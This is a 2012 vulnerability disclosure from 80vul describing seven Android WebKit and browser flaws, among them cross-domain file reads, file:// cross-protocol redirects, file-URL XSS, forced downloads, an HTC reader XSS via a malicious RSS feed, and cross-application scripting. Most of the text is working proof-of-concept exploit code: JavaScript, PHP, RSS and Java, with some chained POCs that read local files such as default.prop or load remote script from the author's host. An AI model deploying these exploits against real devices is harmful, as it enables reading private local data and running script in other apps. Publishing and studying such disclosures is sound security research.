Android  Multiple  Vulnerabilities

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2012/2/8
References: http://www.80vul.com/android/android-0days.txt


Ph4nt0m Webzine 0x06 has been
released[http://www.80vul.com/webzine_0x06/],there
three papers on the android application security about the development
environment,browser security, inter-application communication.And published
a lot of 0days:

[0day-NO.0] android-webkit local cross-domain vulnerability

android-webkit allow local html files cross any http domain and the local
file.demo:

<script>
var request = false;
        if(window.XMLHttpRequest) {
            request = new XMLHttpRequest();
            if(request.overrideMimeType) {
                request.overrideMimeType('text/xml');
            }
        } else if(window.ActiveXObject) {
            var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP',
            'Microsoft.XMLHTTP',
            'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0',
            'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
            for(var i=0; i<versions.length; i++) {
                try {
                    request = new ActiveXObject(versions[i]);
                } catch(e) {}
            }
        }

xmlhttp=request;

//xmlhttp.open("GET", "file://///default.prop", false);
//xmlhttp.open("GET", "http://www.80vul.com/", false);
xmlhttp.send(null);
var ret = xmlhttp.responseText;

alert(ret);
</script>

[0day-NO.1] android-webkit cross-protocol vulnerability

this vul allow cross to the file protocol from http. demo:

<iframe name=f src="location.php" ></iframe>
<script>
function init(){
  f.location = "file:///default.prop";
}
setTimeout(init,5000)
</script>

location.php codz:
<?php
header("Location:file:///80vul.com");
?>

[0day-NO.2] android-webkit file:// protocol xss vulnerability

ON android-webkit File:// protocol, the lack of filtering on the directory
and file name,Lead to cross-site scripting attacks. demo:

visit this : file:///80vul.com/<script>alert(1);</script>

[0day-NO.3] android-browser/firefox auto download the file vulnerability

android-browser/firefox Handle the Content-Disposition: attachment, lack of
safety tips.So through this vul allows users to automatically download the
evil html file to the local directory.

test this code:

<?
//autodown.php
header("Content-Disposition: attachment:filename=autodown.htm");
$data=<<<android_xss_go
<script>alert(/xss/);</script>
android_xss_go;
print $data;
?>

the local file name and the path:

android 1.x --> /sdcard/download/autodown.html
android 2.x-3.x --> /sdcard/download/autodown.htm
android 4.0 --> /sdcard/download/autodown.php
firefox  --> /sdcard/download/autodown.php

So,Let's play a jigsaw puzzle:

POC[1]:
//[0day-NO.1]+[0day-NO.2]
<iframe name=f src="location.php" ></iframe>
<script>
function init(){
  f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";
}
setTimeout(init,5000)
</script>

POC[2]:
//[0day-NO.1]+[0day-NO.3]
<meta http-equiv="refresh" content="0;URL=autodown.php"/>
<iframe name=f src="location.php" ></iframe>
<script>
function init(){
  f.location = "file:///sdcard/Download/autodown.htm";
}
setTimeout(init,5000)
</script>

Now ,We can execute arbitrary js code on the local domain, and we can cross
any http domain and the local file used [0day-NO.0].

and go on ...

[0day-NO.4] webview.loadDataWithBaseURL() cross-protocol vulnerability

By controlling the second argument of webview.loadDataWithBaseURL(),can
cross the file:// protocol use javascript,like
<script>window.location='file://///default.prop';</script> .so the dome apk
demo:

        WebView webview;
        webview = (WebView) findViewById(R.id.webview);
        webview.getSettings().setJavaScriptEnabled(true);
        webview.setWebChromeClient(new WebChromeClient());
        String
data="80vul<script>window.location='file://///default.prop';</script>";
        webview.loadDataWithBaseURL("http://www.baidu.com/", data,
"text/html", "utf-8", null);


[0day-NO.5] com.htc.googlereader XSS vulnerability

com.htc.googlereader is an app on HTC Mobile [G10], there is a xss vul on
this app, then Decompilation and Found this codz:

        label399: String str = this.mHeadlineShown.getSummary();
        if (str.trim().contains("<iframe"))
        {
          this.mWebView.loadData(str, "text/html", "utf-8");
          break label246;
        }
        this.mWebView.loadDataWithBaseURL("http://", str, "text/html",
"utf-8", null);
        break label246;

the "str" have no filter and  can be controlled by evil RSS:


        <item>
            <guid>http://www.80vul.com</guid>
            <title>0day-NO.5</title>
            <link>http://www.80vul.com</link>
            <description><![CDATA[aa&lt;script src=&apos;
http://www.80vul.com/xss.js&apos;&gt;&lt;/script&gt;]]></description>
            <dc:creator>80vul</dc:creator>
            <category>anddoid</category>
            <pubDate>Sun, 04 Sep 2011 13:01:40 -0500</pubDate>
        </item>

When  opens the unread status of the rss, u can get the XSS vul. and this
is mWebView.loadDataWithBaseURL(),so can cross file:// by [0day-NO.4].


[0day-NO.6] Some Browsers for android Cross-Application Scripting
Vulnerability

the evil app can cross browser and execute arbitrary js code on the local
domain. the demo app codz:

//codz base on http://blog.watchfire.com/files/advisory-android-browser.pdf
package com.x;
//opera
//com.opera.browser com.opera.Opera

//firefox
//org.mozilla.firefox org.mozilla.firefox.App

//android
//com.android.browser com.android.browser.BrowserActivity

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class TesttestActivity extends Activity {
static final String mPackage = "com.android.browser";
 static final String mClass = "com.android.browser.BrowserActivity";
static final String gomPackage = "com.opera.browser";
 static final String gomClass = "com.opera.Opera";
static final String mUrl = "http://www.80vul.com/autodown.php";
 static final int mSleep = 15000;
@Override
public void onCreate(Bundle savedInstanceState) {
 super.onCreate(savedInstanceState);
setContentView(R.layout.main);
startBrowserActivity(mUrl);
 try {
Thread.sleep(mSleep);
}
 catch (InterruptedException e) {}
startBrowserActivitygo("file:///sdcard/Download/g.htm");
 }
private void startBrowserActivity(String url) {
Intent res = new Intent("android.intent.action.VIEW");
 res.setComponent(new ComponentName(mPackage,mClass));
res.setData(Uri.parse(url));
 startActivity(res);
}
private void startBrowserActivitygo(String url) {
 Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(gomPackage,gomClass));
 res.setData(Uri.parse(url));
startActivity(res);
}
}

hitest